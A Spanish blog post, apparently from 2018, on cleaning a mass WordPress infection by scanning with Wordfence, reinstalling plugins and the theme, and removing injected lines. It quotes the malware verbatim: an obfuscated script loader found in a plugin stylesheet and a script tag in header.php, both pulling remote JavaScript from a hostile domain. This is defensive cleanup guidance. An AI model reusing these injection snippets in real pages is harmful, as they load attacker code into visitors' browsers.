tityx.com, bemyfreeman.tk, uustoughtonma.org, cdnallyouwantonline.innocraft.cloud infectan WordPress, ¿Como Solucionarlo?

Hola, gracias por visitar de nuevo mi blog, actualmente varios sitios de wordpress han presentado una campaña de infeccion masiva que ha afectado a dos dominios con los que trabajo, han sido dos debido a que tengo una cuenta de hosting compartido para ese cliente asi que a pesar de poder alojar multiples dominios y tener ilimitadas las bases de datos tengo alojadas todas las paginas en el mismo servidor, hace unos dias mi sitio estuvo normal, pero luego la infeccion volvió, cambiaron sus dominios y me todo volver a hacerle una auditoria completa a el sitio infectado y a todos los archivos del hosting en general debido a que el script que causa la infeccion esta programado para replicarse asi mismo.

Este post lo escribo como una actualizacion a mi post anterior Problemas en WordPress con utroro.com y horselorse5151 el ataque ahora tiene vectores distintos y por medio de esta nueva entrada voy a explicar como limpiarlo e intentar eliminar todos los Backdoors.

Hacer análisis de los archivos infectados

Existen paginas de internet para revisar cuales son los archivos infectados de nuestro sitio web, recomiendo usar el SiteCheck de Sucuri, aunque no siempre funciona, en mi caso no me detecto ningún archivo malicioso.

Supongo que es porque todavía los dominios donde están ubicados los archivos maliciosos no han sido añadidos a las listas negras, pero obviamente la infección esta latente en las carpetas de nuestro servidor.

Ahora tenemos dos opciones, revisar manualmente los archivos o usar algún plugin que lo haga por nosotros. igual voy a profundizar lo suficiente para explicar ambos métodos.

Forma Automática usando Plugins

Lo primero es buscar y descargar un plugin de seguridad llamado Wordfence al instalarlo realizaremos un primer escaneo de la pagina web, así detectaremos cuales son los archivos infectados, que son en su mayoría todos los que contengan la palabra Jquery, head y Header en su nombre de archivo.

En Scan vamos ahora a seleccionar la opción que dice START A NEW SCAN

Cuando termine la pagina de hacer el escaneo nos va a mostrar una lista con las infecciones encontradas en nuestro sitio web con un información detallada.

si damos en VIEW DIFFERENCES, tenemos acceso inmediato a un detalle del archivo original y el archivo modificado por el script malicioso.

Ahora para hacer la desinfección tenemos que presionar sobre el boton que dice REPAIR, con esto el archivo hará la recuperación de el código original contenido en el archivo real.

luego nos arrojara un mensaje que dice “Success restoring file“.  No recomiendo usar la opcion que dice “REPAIR ALL REPAIRABLE FILES” porque a veces no permite borrar los archivos completos a la vez. luego de que los borres uno por uno debemos seguir con la desinfección, si tienes otros sitios en tu hosting que trabajen con wordpress también los debes desinfectar todos. si tienes varias cuentas es un proceso largo.

Luego de limpiar y eliminar las alertas tenemos que seguir revisando la pagina web, vamos a comenzar desde el directorio de instalación de wordpress, usando el Cpanel podemos ver fechas de la ultima modificación de los archivos, entramos a la carpeta wp-content yo personalmente voy a borrar todas las carpetas menos languages, plugins, themes y la carpeta uploads, el archivo index.php tampoco lo deben borrar.

Despues vamos a revisar las carpetas restantes, comenzando por la de languajes, todos son archivos en formato .mo o .po que no ejecutan codigo en el navegador, ademas la fecha ultima de modificacion no es reciente (teniendo en cuenta el vector de la infeccion, hoy es 3 de septiembre de 2018 han pasado unos 2 días desde que detecte nuevamente el ataque)

Ahora estoy ubicado en la carpeta Plugins, yo manejo los siguientes plugins en la pagina web mostrada en la infeccion: contact-form-7, hover-video-preview, hover-video-preview, js_composer(visual composer), redux-framework, thumbnail-crop-position, wordfence,  wordpress-seo y wp-gdpr-compliance.

Entrando en la primera carpeta-contact form revisaba si el plugin se habia infectado, para esto abri el archivo wp-contact-form-7.php pero se veia normal, al abrir la carpeta includes/js/jquery-ui/themes/smoothness/ y abri el archivo jquery-ui.css con el editor del cpanel tenia código malicioso en la cabecera, pese a ser una hoja de estilos, es mejor evitar todo tipo de intrusion, asi que lo mejor que puedes hacer una vez alcanzado este punto es borrar los plugins y volverlos a activar, eso si no has hecho una copia de seguridad.

Esa linea de codigo tiene lo siguiente:

var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script');
var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}

Este archivo aparece repetido en todos los archivos que contengan la palabra “Jquery” ademas de buscar y sobrescribir también los archivos con nombre “header” o “head”

Para poder eliminar el archivo tenemos que volver a subir todos los plugins, porque los archivos estan corruptos.

Es posible que la plantilla tambien este mal, asi que toca subir de nuevo la plantilla a la pagina web.

siempre es bueno al usar el administrador de archivos organizar los resultados por Last Modified asi se pueden ver ma facil los archivos modificados de forma reciente, en Header.php adentro de la carpeta Themes, yo en esa pagina uso el theme Unbound.

En la cabecera vemos varias lineas de codigo inyectadas. todas con el mismo codigo malicioso.

La maldita linea de codigo es esta:

<script type='text/javascript' src='https://stat.uustoughtonma.org/stats.js?f=2'></script>

esta por todas partes, asi que tenemos que borrarla las veces que aparece.

Ya manualmente toca subir uno a uno los plugins nuevamente, y tambien toca volver a subir la plantilla UNBOUND, al haberla comprado tenemos acceso a bajarla en su ultima version, yo recomiendo este metodo por eso

te recuerdo que si estas interesado en recibir mas información al correo puedes suscribirte aqui: 

Esta entrada fue publicada en Guias, Seguridad, Wordpress y etiquetada , , , . Guarda el enlace permanente.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *